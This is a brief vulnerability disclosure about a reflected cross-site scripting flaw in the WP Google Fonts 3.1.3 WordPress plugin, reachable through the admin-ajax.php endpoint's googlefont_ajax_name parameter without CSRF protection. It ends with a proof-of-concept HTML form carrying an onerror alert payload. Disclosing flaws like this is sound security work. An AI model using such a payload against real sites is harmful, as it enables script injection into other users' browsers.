Hello,

Plugin: WP Google Fonts v3.1.3 https://wordpress.org/plugins/wp-google-fonts/

1. Cross-Site Scripting (XSS) (Reflected)

Authenticated users (like subscribers) can inject html/js code (there is no CSRF protection).

Method: POST

Url: http://localhost/wp-admin/admin-ajax.php?action=googlefont_action

Vulnerable parameters: googlefont_ajax_name

Example PHP callstack:

googlefonts::googlefont_action_callback   [/wp-google-fonts/google-fonts.php:1281]

Verification:

--

<form method="POST" action="http://localhost/wp-admin/admin-ajax.php?action=googlefont_action" />

<input type="text" name="googlefont_ajax_name" value='"><img src=x onerror=alert(1) /> ' />

<input type="submit" />

</form>

--